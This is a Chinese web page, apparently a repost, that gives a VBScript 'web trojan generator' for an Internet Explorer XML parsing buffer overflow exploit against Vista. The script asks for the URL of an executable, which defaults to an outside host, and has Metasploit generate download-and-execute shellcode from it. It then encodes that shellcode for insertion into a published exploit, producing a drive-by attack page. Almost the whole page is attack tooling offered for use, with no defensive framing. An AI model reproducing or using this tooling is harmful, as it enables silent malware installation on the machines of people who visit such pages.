网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day
来源: 阅读:1458 次 日期:2016-07-20 14:06:19
温馨提示: 小编为您整理了“网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day”,方便广大网友查阅!

MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day利用代码

'code by lcx

On Error Resume Next

Exeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )

url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload"

Body = getHTTPPage(url)

Set Re = New RegExp

Re.Pattern = "(\$shellcode \=[\s\S]+</div></pre>)"

Set Matches = Re.Execute(Body)

If Matches.Count>0 Then Body = Matches(0).value

code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))

function replaceregex(str)

set regex=new regExp

regex.pattern="\\x(..)\\x(..)"

regex.IgnoreCase=true

regex.global=true

matches=regex.replace(str,"%u$2$1")

replaceregex=matches

end Function

Function getHTTPPage(Path)

t = GetBody(Path)

getHTTPPage = BytesToBstr(t, "GB2312")

End Function

Function GetBody(url)

On Error Resume Next

Set Retrieval = CreateObject("Microsoft.XMLHTTP")

With Retrieval

.Open "Get", url, False, "", ""

.Send

GetBody = .ResponseBody

End With

Set Retrieval = Nothing

End Function

Function BytesToBstr(Body, Cset)

Dim objstream

Set objstream = CreateObject("adodb.stream")

objstream.Type = 1

objstream.Mode = 3

objstream.Open

objstream.Write Body

objstream.Position = 0

objstream.Type = 2

objstream.Charset = Cset

BytesToBstr = objstream.ReadText

objstream.Close

Set objstream = Nothing

End Function

Function URLEncoding(vstrIn)

strReturn = ""

For aaaa = 1 To Len(vstrIn)

ThisChr = Mid(vStrIn,aaaa,1)

If Abs(Asc(ThisChr)) < &HFF Then

strReturn = strReturn & ThisChr

Else

innerCode = Asc(ThisChr)

If innerCode < 0 Then

innerCode = innerCode + &H10000

End If

Hight8 = (innerCode And &HFF00)\ &HFF

Low8 = innerCode And &HFF

strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)

End If

Next

URLEncoding = strReturn

End Function

set fso=CreateObject("scripting.filesystemobject")

set fileS=fso.opentextfile("a.txt",2,true)

fileS.writeline replaceregex(code)

'fileS.writeline body

wscript.echo replaceregex(code)

files.close

set fso=Nothing

wscript.echo Chr(13)&"ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"

更多信息请查看脚本栏目
由于各方面情况的不断调整与变化, 提供的所有考试信息和咨询回复仅供参考,敬请考生以权威部门公布的正式信息和咨询为准!
关于我们 | 联系我们 | 人才招聘 | 网站声明 | 网站帮助 | 非正式的简要咨询 | 简要咨询须知 | 加入群交流 | 手机站点 | 投诉建议
工业和信息化部备案号:滇ICP备2023014141号-1 云南省教育厅备案号:云教ICP备0901021 滇公网安备53010202001879号 人力资源服务许可证:(云)人服证字(2023)第0102001523号
云南网警备案专用图标
联系电话:0871-65317125(9:00—18:00) 获取招聘考试信息及咨询关注公众号:
咨询QQ:526150442(9:00—18:00)版权所有:
云南网警报警专用图标
Baidu
map